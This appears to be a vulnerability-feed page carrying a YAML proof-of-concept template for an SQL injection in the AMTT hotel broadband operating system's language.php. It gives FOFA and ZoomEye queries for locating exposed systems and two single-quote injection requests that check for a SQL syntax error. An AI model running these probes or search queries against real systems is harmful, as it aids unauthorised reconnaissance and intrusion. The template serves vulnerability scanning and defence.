amtt-eflow-hsia-language-sqli: 安美数字酒店宽带运营系统SQL注入漏洞

2025-08-01 安美数字酒店宽带运营系统 PoC Public

Description

fofa: title="酒店宽带运营系统"

zoomeye: app="安美数字酒店宽带运营系统"

PoC

id: amtt-eflow-hsia-language-sqli

info:
  name: 安美数字酒店宽带运营系统SQL注入漏洞
  author: qiwentaidi
  severity: high
  verified: true
  description: |-
    fofa: title="酒店宽带运营系统"
    zoomeye: app="安美数字酒店宽带运营系统"
  reference:
    - https://amttgroup.com/product-01-HSIA.html
  tags: amtt,eflow,hsia,sqli
  created: 2023/10/25

rules:
  r0:
    request:
      method: GET
      path: /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
  r1:
    request:
      method: GET
      path: /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
expression: r0() || r1()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities